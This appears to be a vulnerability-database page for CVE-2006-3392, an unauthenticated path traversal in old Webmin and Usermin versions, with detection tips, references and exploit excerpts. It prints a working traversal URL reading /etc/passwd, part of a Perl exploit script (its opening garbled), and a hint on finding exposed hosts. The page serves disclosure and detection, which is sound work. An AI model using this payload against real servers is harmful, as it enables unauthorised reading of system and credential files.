CVE-2006-3392
published 2006-07-06CVE-2006-3392: Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML, which allows remote attackers to read arbitrary files, as…
PriorityP351medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
77.95%
99.5th percentile
Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML, which allows remote attackers to read arbitrary files, as demonstrated using "..%01" sequences, which bypass the removal of "../" sequences before bytes such as "%01" are removed from the filename. NOTE: This is a different issue than CVE-2006-3274.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| usermin | usermin | <= 1.210 | — |
| webmin | webmin | <= 1.2.80 | — |
Detection & IOCsextracted from sources · hover to see the quote
url/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd↗
bytes↗
..%01
- →Look for HTTP GET requests targeting the '/unauthenticated/' path containing '..%01' sequences, which are the encoded path traversal bypass used to escape directory restrictions before HTML decoding occurs. ↗
- →The exploit repeats '..%01' approximately 40 times in the URL path to ensure traversal to the filesystem root regardless of working directory depth. ↗
- →No authentication is required to exploit this vulnerability; monitor for unauthenticated requests to Webmin/Usermin containing percent-encoded traversal sequences in the URL. ↗
- →Successful exploitation returns file contents (e.g., /etc/passwd) in the HTTP 200 response body; match response body for 'root:.*:0:0:' pattern to confirm exploitation. ↗
- →Shodan/FOFA fingerprinting for exposed Webmin instances can be performed using the title 'webmin' to identify potentially vulnerable targets. ↗
- ·The vulnerability affects Webmin versions strictly prior to 1.290 and Usermin versions strictly prior to 1.220; patched versions are not exploitable via this technique. ↗
- ·This is a distinct issue from CVE-2006-3274; detection rules should not conflate the two vulnerabilities even though both affect Webmin path handling. ↗
- ·The exploit works over both HTTP and HTTPS; detection must cover both protocols on the Webmin/Usermin listening port (default 10000). ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure
exploitdb·2006-07-15
CVE-2006-3392 Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure
Webmin new;
if (@ARGV \n");
print("TARGETS are\n ");
print("0 - > HTTP \n");
print(" 1 - > HTTPS\n");
print("Define full path with file name \n");
print("Example: ./webmin.pl blah.com 10000 /etc/passwd\n");
exit(1);
}
($target, $port,$filename, $tar) = @ARGV;
print("WEBMIN EXPLOIT !!!!! coded by UmZ!\n");
print("Comments and Suggestions are welcome at umz32.dll [at] gmail.com\n");
print("Vulnerability disclose at securitydot.net\nI am just coding it in perl 'cuz I hate PHP!\n");
print("Attacking $target on port $port!\n");
print("FILENAME: $filename\n");
$temp="/..%01" x 40;
if ($tar == '0')
{ my $url= "http://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;
$content=get $url;
print("\n FILE CONTENT STARTED");
print("\n -----------------------------------\n");
print(
Metasploit
Webmin File Disclosure
metasploit
Webmin File Disclosure
Webmin File Disclosure
A vulnerability has been reported in Webmin and Usermin, which can be exploited by malicious people to disclose potentially sensitive information. The vulnerability is caused due to an unspecified error within the handling of an URL. This can be exploited to read the contents of any files on the server via a specially crafted URL, without requiring a valid login. The vulnerability has been reported in Webmin (versions prior to 1.290) and Usermin (versions prior to 1.220).
Nuclei
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure
nuclei·CVSS 5.0
CVE-2006-3392 [MEDIUM] Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure
Webmin before 1.290 and Usermin before 1.220 contain a path traversal caused by calling the simplify_path function before decoding HTML, letting remote attackers read arbitrary files, exploit requires sending crafted '..%01' sequences.
Template:
id: CVE-2006-3392
info:
name: Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure
author: s4e-io
severity: medium
description: |
Webmin before 1.290 and Usermin before 1.220 contain a path traversal caused by calling the simplify_path function before decoding HTML, letting remote attackers read arbitrary files, exploit requires sending crafted '..%01' sequences.
impact: |
Attackers can read arbitrary files on the server, potentially exposing sensitive information.
remediation
No writeups or analysis indexed.
http://attrition.org/pipermail/vim/2006-July/000923.htmlhttp://attrition.org/pipermail/vim/2006-June/000912.htmlhttp://secunia.com/advisories/20892http://secunia.com/advisories/21105http://secunia.com/advisories/21365http://secunia.com/advisories/22556http://security.gentoo.org/glsa/glsa-200608-11.xmlhttp://www.debian.org/security/2006/dsa-1199http://www.kb.cert.org/vuls/id/999601http://www.mandriva.com/security/advisories?name=MDKSA-2006:125http://www.osvdb.org/26772http://www.securityfocus.com/archive/1/439653/100/0/threadedhttp://www.securityfocus.com/archive/1/440125/100/0/threadedhttp://www.securityfocus.com/archive/1/440466/100/0/threadedhttp://www.securityfocus.com/archive/1/440493/100/0/threadedhttp://www.securityfocus.com/bid/18744http://www.vupen.com/english/advisories/2006/2612http://www.webmin.com/changes.htmlhttp://attrition.org/pipermail/vim/2006-July/000923.htmlhttp://attrition.org/pipermail/vim/2006-June/000912.htmlhttp://secunia.com/advisories/20892http://secunia.com/advisories/21105http://secunia.com/advisories/21365http://secunia.com/advisories/22556http://security.gentoo.org/glsa/glsa-200608-11.xmlhttp://www.debian.org/security/2006/dsa-1199http://www.kb.cert.org/vuls/id/999601http://www.mandriva.com/security/advisories?name=MDKSA-2006:125http://www.osvdb.org/26772http://www.securityfocus.com/archive/1/439653/100/0/threadedhttp://www.securityfocus.com/archive/1/440125/100/0/threadedhttp://www.securityfocus.com/archive/1/440466/100/0/threadedhttp://www.securityfocus.com/archive/1/440493/100/0/threadedhttp://www.securityfocus.com/bid/18744http://www.vupen.com/english/advisories/2006/2612http://www.webmin.com/changes.html
2006-07-06
Published